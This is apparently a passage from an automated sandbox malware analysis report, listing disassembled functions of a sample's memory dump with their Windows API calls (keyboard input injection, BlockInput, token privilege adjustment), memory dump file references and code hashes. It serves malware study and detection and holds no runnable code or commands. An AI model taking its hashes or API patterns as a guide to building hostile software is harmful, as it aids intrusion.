                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00AEC2E2,?,?,00000000,?), ref: 00ADD73F
                                                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00AEC2E2,?,?,00000000,?), ref: 00ADD751
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3479602957-0
                                                                                                                                                        • Opcode ID: 5c817e87610adc889c7509276f3f55a6e0eed2adfdc9e45295c25f74bd170489
                                                                                                                                                        • Instruction ID: 421dc574983f373adf1382684e7c4ea3b39f150898885f0123d1fab586a94fe1
                                                                                                                                                        • Opcode Fuzzy Hash: 5c817e87610adc889c7509276f3f55a6e0eed2adfdc9e45295c25f74bd170489
                                                                                                                                                        • Instruction Fuzzy Hash: 2DF08C3510032DABDB21AFA4CC49FEA7BADAF493A1F008156B91AD7181D6709A40CBA0
                                                                                                                                                        Function 00AD4B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00AD4B89
                                                                                                                                                        • keybd_event.USER32(?,7608C0D0,?,00000000), ref: 00AD4B9C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3536248340-0
                                                                                                                                                        • Opcode ID: a51c5ff87ce81378cfecdcbf6027837b56daf375d4de3f345a841830da2e8eb2
                                                                                                                                                        • Instruction ID: b9fd87150471da4d2176f171b5f3234ba8fe108d90788de59e42fe77b696c89d
                                                                                                                                                        • Opcode Fuzzy Hash: a51c5ff87ce81378cfecdcbf6027837b56daf375d4de3f345a841830da2e8eb2
                                                                                                                                                        • Instruction Fuzzy Hash: 42F01D7090434DAFDB058FA5C805BBE7BB4AF14305F04C40AF955A6291D779C6159F94
                                                                                                                                                        Function 00ACB8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 00ACB8C5
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00ACB8D7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 81990902-0
                                                                                                                                                        • Opcode ID: bb9fb207d5058009f921c0dbe902c61ff94d4bd30aa7ff595504c1be870e497e
                                                                                                                                                        • Instruction ID: c703ca4f6398407495c633f34de5e2856e449762f65545a13ed16b5fdef61f3a
                                                                                                                                                        • Opcode Fuzzy Hash: bb9fb207d5058009f921c0dbe902c61ff94d4bd30aa7ff595504c1be870e497e
                                                                                                                                                        • Instruction Fuzzy Hash: A1E0B672014611AEE7262B64FD09DB77BEDEF08311B11C929F49682471DB62AC90DB10
                                                                                                                                                        Function 00AFF594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00AFF59C
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00B0F3AD,?,?,?,?), ref: 00AFF5C6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                                        • Opcode ID: 89d2e2a9b3edc6d1b5b4a75c6259f20c83f908ed3baeab86e6d50b1be6131d30
                                                                                                                                                        • Instruction ID: 3e937419ef28ecd2064bde4c17385f1f7f62b27c2fbb27b7f326901f0b1fe00d
                                                                                                                                                        • Opcode Fuzzy Hash: 89d2e2a9b3edc6d1b5b4a75c6259f20c83f908ed3baeab86e6d50b1be6131d30
                                                                                                                                                        • Instruction Fuzzy Hash: B9E0C27010422CBFEB141F19DC0AFB93B28FB00B50F10C526FA57C90E0DBB088A0D660
                                                                                                                                                        Function 00AB8E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,00A9125D,00AB7A43,00A90F35,?,?,00000001), ref: 00AB8E41
                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00AB8E4A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                        • Opcode ID: 7ee4ee3016e1c8ce53920bf499f65ed640a3f359f174af64936cf181d916d132
                                                                                                                                                        • Instruction ID: 0a2f519658063e377239753cdaf68f5dd3ba06571924ff205d1add3dcd942e01
                                                                                                                                                        • Opcode Fuzzy Hash: 7ee4ee3016e1c8ce53920bf499f65ed640a3f359f174af64936cf181d916d132
                                                                                                                                                        • Instruction Fuzzy Hash: FFB09271044A08ABEA002BA1FC09BC83F78EB08A62F808010F62D46060CF6354508A9A
                                                                                                                                                        Function 00AC113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 96e724d42ecc4ef5b946502ac56e706b206c3754894f134d4587f8184bcdb65d
                                                                                                                                                        • Instruction ID: 6ae55884aa5d8c46373ceb529d11c3d855a50f23ae4f833510b44d739e7841f5
                                                                                                                                                        • Opcode Fuzzy Hash: 96e724d42ecc4ef5b946502ac56e706b206c3754894f134d4587f8184bcdb65d
                                                                                                                                                        • Instruction Fuzzy Hash: 3EB1CF20E2AF404DD63396398831337B65CAFBB2D5F92D71BFC6A75D62EB2185834180
                                                                                                                                                        Function 00B002AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00B00352
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                                        • Opcode ID: bb38566137cd3ef12ad9596179e863b833180ec6b3097473c7dc50f3e5f8bbda
                                                                                                                                                        • Instruction ID: f0424d8de33fb553c5b8ea1520154df63fb537949c23f94f8c53bbf563c99c88
                                                                                                                                                        • Opcode Fuzzy Hash: bb38566137cd3ef12ad9596179e863b833180ec6b3097473c7dc50f3e5f8bbda
                                                                                                                                                        • Instruction Fuzzy Hash: 81113A31214219BBFB263B2CCD45FBD3E94E749720F244395FA115B1E2CFA48D01D269
                                                                                                                                                        Function 00AFE769 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAB155: GetWindowLongW.USER32(?,000000EB), ref: 00AAB166
                                                                                                                                                        • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00AFE7AF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$CallLongProc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4084987330-0
                                                                                                                                                        • Opcode ID: 67de2472e679c40278b920cb143cba0e15b41265441382de15172600d3edae17
                                                                                                                                                        • Instruction ID: 911f959172b4a7afd993071f0b626d9d5abce4c389d91acf83bca25e4c855cf2
                                                                                                                                                        • Opcode Fuzzy Hash: 67de2472e679c40278b920cb143cba0e15b41265441382de15172600d3edae17
                                                                                                                                                        • Instruction Fuzzy Hash: F3F0EC3610010CAFCF15EF98DC449B93BA6EB04361B448554FA558B6B1CB329D60EB50
                                                                                                                                                        Function 00AFEA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                          • Part of subcall function 00AAB736: GetCursorPos.USER32(000000FF), ref: 00AAB749
                                                                                                                                                          • Part of subcall function 00AAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00AAB766
                                                                                                                                                          • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000001), ref: 00AAB78B
                                                                                                                                                          • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000002), ref: 00AAB799
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00B0F417,?,?,?,?,?,00000001,?), ref: 00AFEA9C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2356834413-0
                                                                                                                                                        • Opcode ID: eca3dfbfa006bb3b89cb33698cfa75cc4d7280e0661f48ff3641c1c15f3f5531
                                                                                                                                                        • Instruction ID: c5a67a0efd8bb34a4b49435260985a2bc23044abd15d7ef10f11eabc84748c2a
                                                                                                                                                        • Opcode Fuzzy Hash: eca3dfbfa006bb3b89cb33698cfa75cc4d7280e0661f48ff3641c1c15f3f5531
                                                                                                                                                        • Instruction Fuzzy Hash: 62F0A031200229ABDB14AF19CC0AFBE3FA1FB01791F004055FA061B1E2DBB69C61DBE1
                                                                                                                                                        Function 00AAB7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,00AAAF40,?,?,?,?,?), ref: 00AAB83B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                                        • Opcode ID: 6398e4c6e2b54b7c5d2d940c96ed7a4f32790cb5cfc6dfe9639049cc5b3b71e3
                                                                                                                                                        • Instruction ID: ec674be2dbb44d4f2ca46dfcb3865be5666b54c2928469eee627807c7bbab0ca
                                                                                                                                                        • Opcode Fuzzy Hash: 6398e4c6e2b54b7c5d2d940c96ed7a4f32790cb5cfc6dfe9639049cc5b3b71e3
                                                                                                                                                        • Instruction Fuzzy Hash: 7EF05E306002099FDB289F18DC90B793BA6FB15361F108669F9524B2E1DB71D850DBA0
                                                                                                                                                        Function 00AE703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • BlockInput.USER32(00000001), ref: 00AE7057
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BlockInput
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3456056419-0
                                                                                                                                                        • Opcode ID: 24e8189981be92b63bd6ed63a67a80b30040ca26ace72f4fb3fe5e618130ee4b
                                                                                                                                                        • Instruction ID: ff4cf8c11ccac603847894b82a3b54a94a9ea2db0a36a875b1645adfe62716aa
                                                                                                                                                        • Opcode Fuzzy Hash: 24e8189981be92b63bd6ed63a67a80b30040ca26ace72f4fb3fe5e618130ee4b
                                                                                                                                                        • Instruction Fuzzy Hash: 04E048353042045FD710EFA9D504E9AF7ECAF54750F00C426F945D7251DAB0E8009BA0
                                                                                                                                                        Function 00AFF3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00AFF41A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
